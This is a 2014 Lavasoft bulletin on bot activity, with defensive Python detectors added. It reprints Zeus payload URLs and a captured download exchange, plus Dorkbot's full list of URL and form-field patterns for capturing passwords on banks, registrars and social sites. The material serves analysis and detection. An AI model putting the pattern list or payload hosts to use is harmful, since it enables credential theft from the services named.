Lavasoft Security Bulletin - May 2014: Bot Review

Bot Review

Table: Bots under analysis (May 2014, Lavasoft MAS).

Bot's name        April 2014   May 2014   Change (share of total)
Zbot                     568        149   -51.3%
Cycbot                    10         19     1.1%
Kelihos                   68        472    49.4%
NrgBot/Dorkbot           149        169     2.4%
Blazebot/Rbot              5          2    -0.4%
Shiz                       7          6    -0.1%
Total                    807        818



Bot distribution in May:

Kelihos. This month we see a significant increase in Kelihos backdoors discovered in the Lab: 58% in May against 8% in April. You can read more about the anti-analysis techniques adopted by the Kelihos bot here.

Cycbot. You can find the latest Cycbot description here.

Shiz. The latest description is here.

Zbot. Read more about the Zeus variant found in May in the Malware Encyclopedia. 30% of all detected Zeus samples use a Tor client.

Zeus continues to download its files in encrypted form:

URL                                                     IP
hxxp://highclassdelhiescorts.in/images/css/al0302.enc   103.8.127.189
hxxp://manjena.com/images/al0302.enc                    184.107.194.106


This time the Canadian server replied with the ZZP file (329 288 bytes in size):

GET /images/al0302.enc HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: manjena.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 24 May 2014 06:00:28 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6
Last-Modified: Mon, 03 Feb 2014 15:36:31 GMT
ETag: "a548037-50648-4f18249ad9dc0"
Accept-Ranges: bytes
Content-Length: 329288
Connection: close
Content-Type: text/plain


ZZP..~.:.T.tS...W.......S..vS..OJ.)w_..w....Z...S...r... ...!...2..W0.
..<..w1...&...S..3....<D..}..}w.GwWF:..'T....X..3 Q..3...pl6.wT.
..U6.upP.x|.TM...p[6..S...0..HFo.w...;R..P[. %V.!wP..|R..w;.....C~...u
CD..V..d...wS..1R...P..qQ^".2..x....FB.qP..w.m.w{..q..usr..o.H...G@.F.

<<< skipped >>>

After decrypting it with the Zeus decryption tool (ZeusDecryptor) we found the usual randomly named application (MD5: f1f03b73b6c32ef28514d740073a4941, 386 560 bytes in size):

%Documents and Settings%\%current user%\Application Data\Idaz\ecyche.exe

The downloader also copies itself as “pdfupdate.exe” (MD5: 0a2947abe4c9e6d539066993690c8a38, 19 224 bytes in size) to the %Temp% folder and executes it.
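The captured request and response above carry several traits a proxy or IDS can key on: the non-browser "Updates downloader" User-Agent, a request for a ".enc" file, and a text/plain response whose body is binary and starts with the "ZZP" marker. The following is an added example (not Lavasoft's tooling and not part of the original bulletin) that parses raw HTTP messages and reports which of those traits are present; the sample messages are constructed from the capture with the body truncated to a few bytes, and the 0.8 printable-byte threshold is an assumption chosen here.

```python
"""Flag an HTTP exchange that looks like the Zeus '.enc' update download."""


def parse_http(raw):
    """Split a raw HTTP message into (start_line, {lowercased header: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def printable_ratio(data):
    """Fraction of bytes that are printable ASCII or whitespace (1.0 for empty)."""
    if not data:
        return 1.0
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(data)


def zeus_download_indicators(request, response):
    """Return the names of the capture-derived indicators present in the exchange."""
    hits = []
    req_line, req_hdrs, _ = parse_http(request)
    _, resp_hdrs, body = parse_http(response)
    _, _, rest = req_line.partition(" ")
    path = rest.split(" ")[0]
    if req_hdrs.get("user-agent", "").lower() == "updates downloader":
        hits.append("zeus-user-agent")
    if path.lower().endswith(".enc"):
        hits.append("enc-payload-path")
    if body.startswith(b"ZZP"):
        hits.append("zzp-magic")
    ctype = resp_hdrs.get("content-type", "").lower()
    # Assumed threshold: a text/* response whose body is mostly non-printable
    # bytes is being used to smuggle a binary blob.
    if ctype.startswith("text/") and printable_ratio(body) < 0.8:
        hits.append("binary-body-declared-as-text")
    return hits


# Constructed samples built from the capture quoted in the bulletin.
SAMPLE_REQUEST = (
    b"GET /images/al0302.enc HTTP/1.1\r\n"
    b"Accept: text/*, application/*\r\n"
    b"User-Agent: Updates downloader\r\n"
    b"Host: manjena.com\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/plain\r\n"
    b"Content-Length: 329288\r\n"
    b"\r\n"
    b"ZZP\x01~\x02:\x9fT\xe0tS\x11\x12W"  # body truncated to its first bytes
)
# Constructed benign exchange for comparison.
BENIGN_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Host: example.org\r\n\r\n"
)
BENIGN_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n\r\n"
    b"<html><body>hello</body></html>"
)

if __name__ == "__main__":
    print("zeus sample  :", zeus_download_indicators(SAMPLE_REQUEST, SAMPLE_RESPONSE))
    print("benign sample:", zeus_download_indicators(BENIGN_REQUEST, BENIGN_RESPONSE))
```

Any single indicator on its own is weak (a legitimate updater may well use a plain User-Agent), so a rule would normally require two or more of them before alerting.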

NrgBot/Dorkbot. The number of Dorkbots has been growing since March. You can find the latest description here.

Currently the backdoor uses the following wildcard expressions, matched against request URLs and submitted form data, to steal logins and passwords for popular services:

iknowthatgirl*/members*, *youporn.*/login*, *members.brazzers.com*, *bcointernacional*login*, *:2222/CMD_LOGIN*, *whcms*dologin*, *:2086/login*, *:2083/login*, *:2082/login*, *webnames.ru/*user_login*, Webnames, *dotster.com/*login*, loginid, *enom.com/login*, login.Pass, login.User, *login.Pass=*, *1and1.com/xml/config*, *moniker.com/*Login*, LoginPassword, LoginUserName, *LoginPassword=*, *namecheap.com/*login*, loginname, *godaddy.com/login*, Password, *Password=*, *alertpay.com/login*, *netflix.com/*ogin*, *thepiratebay.org/login*, *torrentleech.org/*login*, *vip-file.com/*/signin-do*, *sms4file.com/*/signin-do*, *letitbit.net*, *what.cd/login*, *oron.com/login*, *filesonic.com/*login*, *speedyshare.com/login*, *uploaded.to/*login*, *uploading.com/*login*, loginUserPassword, loginUserName, *loginUserPassword=*, *fileserv.com/login*, *hotfile.com/login*, *4shared.com/login*, txtpass, *txtpass=*, *netload.in/index*, *freakshare.com/login*, login_pass, *login_pass=*, *mediafire.com/*login*, *sendspace.com/login*, *megaupload.*/*login*, *depositfiles.*/*/login*, *signin.ebay*SignIn, *officebanking.cl/*login.asp*, *secure.logmein.*/*logincheck*, session[password], *password]=*, *twitter.com/sessions, txtPassword, *&txtPassword=*, *.moneybookers.*/*login.pl, *runescape*/*weblogin*, *&password=*, *no-ip*/login*, *steampowered*/login*, quick_password, *hackforums.*/member.php, *facebook.*/login.php*, *login.yahoo.*/*login*, passwd, login, *passwd=*, *login.live.*/*post.srf*, TextfieldPassword, *TextfieldPassword=*, *gmx.*/*FormLogin*, *Passwd=*, FLN-Password, *FLN-Password=*, *pass=*, *bigstring.*/*index.php*, *screenname.aol.*/login.psp*, password, loginId, *password=*, *aol.*/*login.psp*, Passwd, *google.*/*ServiceLoginAuth*, login_password, login_email, *login_password=*, *paypal.*/webscr?cmd=_login-submit*, *bebo.*/c/profile/comment_post.json, *bebo.*/mail/MailCompose.jsp*, *friendster.*/sendmessage.php*, *friendster.*/rpc.php, *vkontakte.ru/mail.php, *vkontakte.ru/wall.php, *vkontakte.ru/api.php, *facebook.*/ajax/*MessageComposerEndpoint.php*, msg_text, *facebook.*/ajax/chat/send.php*

The patterns above target the following online services:

iknowthatgirl.com, youporn.com, brazzers.com, bancointernacional.com.ec, webnames.ru, dotster.com, enom.com, 1and1.com, moniker.com, namecheap.com, godaddy.com, alertpay.com, netflix.com, thepiratebay.org, torrentleech.org, vip-file.com, sms4file.com, letitbit.net, what.cd, oron.com, filesonic.com, speedyshare.com, uploaded.to, uploading.com, fileserv.com, hotfile.com, 4shared.com, netload.in, freakshare.com, mediafire.com, sendspace.com, megaupload.com, depositfiles.com, ebay.com, officebanking.cl, logmein.com, twitter.com, moneybookers.com, runescape.com, hackforums.com, facebook.com, yahoo.com, live.com, gmx.com, aol.com, google.com, paypal.com, bebo.com, friendster.com, vkontakte.ru, facebook.com

Among them are porn websites, domain registrars, online banking services, file sharing services, online games and popular social networks.
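A defender holding this list can use it to find out which of the services their own users log into would be caught by the bot's hooks, for example by running it over proxy logs. The following is an added example (not Lavasoft's or the bot's code) that sorts a subset of the expressions quoted above into URL patterns, POST-body patterns and bare form-field names, compiles the wildcards into regular expressions in which only "*" is special, and reports which logged URLs or submitted fields would match. The bucketing heuristic, the case-insensitive matching and the sample log lines are all assumptions made here.

```python
"""Audit web traffic against the Dorkbot credential-theft pattern list."""
import re

# Subset of the expressions quoted in the bulletin (constructed excerpt).
DORKBOT_EXPRESSIONS = [
    "*members.brazzers.com*", "*:2083/login*", "*:2086/login*",
    "*namecheap.com/*login*", "*godaddy.com/login*", "*netflix.com/*ogin*",
    "*signin.ebay*SignIn", "*letitbit.net*", "*twitter.com/sessions",
    "*login.live.*/*post.srf*", "*google.*/*ServiceLoginAuth*",
    "*paypal.*/webscr?cmd=_login-submit*", "*facebook.*/login.php*",
    "session[password]", "*password]=*", "login_email", "login_password",
    "*login_password=*", "Passwd", "*Passwd=*", "txtPassword", "*&txtPassword=*",
    "*whcms*dologin*",
]


def classify(patterns):
    """Sort expressions into url / body / field buckets.

    Heuristic (assumption): no '*' means a bare form-field name; a '/' or ':'
    marks a URL pattern; a remaining '=' marks a POST-body pattern; any other
    wildcard expression is treated as a URL pattern.
    """
    buckets = {"url": [], "body": [], "field": []}
    for p in patterns:
        if "*" not in p:
            buckets["field"].append(p)
        elif "/" in p or ":" in p:
            buckets["url"].append(p)
        elif "=" in p:
            buckets["body"].append(p)
        else:
            buckets["url"].append(p)
    return buckets


def glob_to_regex(pattern):
    """Compile a '*'-only wildcard into an anchored regex; every other
    character ('?', '[', ']', '.') is literal."""
    parts = [re.escape(piece) for piece in pattern.split("*")]
    return re.compile("^" + ".*".join(parts) + "$", re.IGNORECASE)


BUCKETS = classify(DORKBOT_EXPRESSIONS)
URL_RULES = [(p, glob_to_regex(p)) for p in BUCKETS["url"]]
BODY_RULES = [(p, glob_to_regex(p)) for p in BUCKETS["body"]]
FIELD_NAMES = {f.lower() for f in BUCKETS["field"]}


def audit_url(url):
    """Return the URL patterns a request URL would match."""
    return [p for p, rx in URL_RULES if rx.match(url)]


def audit_post(body):
    """Return (matching body patterns, targeted field names) for a form body."""
    patterns = [p for p, rx in BODY_RULES if rx.match(body)]
    fields = [kv.split("=", 1)[0].lower() for kv in body.split("&") if kv]
    return patterns, sorted(f for f in fields if f in FIELD_NAMES)


def audit_proxy_log(lines):
    """Map each URL in a 'METHOD URL' proxy log to the patterns it hits."""
    report = {}
    for line in lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        hits = audit_url(parts[1])
        if hits:
            report[parts[1]] = hits
    return report


# Constructed proxy log lines for the demonstration.
SAMPLE_LOG = [
    "GET https://www.namecheap.com/myaccount/login.aspx",
    "GET https://example.org/news",
    "POST http://192.0.2.10:2083/login/",
]

if __name__ == "__main__":
    for url, hits in audit_proxy_log(SAMPLE_LOG).items():
        print(url, "->", hits)
    print(audit_post("login_email=a%40b.test&login_password=hunter2"))
```

The point of writing glob_to_regex by hand rather than using fnmatch is that expressions such as "session[password]" and "*paypal.*/webscr?cmd=_login-submit*" contain characters fnmatch would treat as metacharacters; escaping everything except "*" keeps the match faithful to the list.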

Blazebot/Rbot. The latest description is available in Malware Encyclopedia.

Read also:
Lavasoft Security Bulletin - May 2014: Top Threats.
Kelihos Adopts Anti-Analysis Technique.
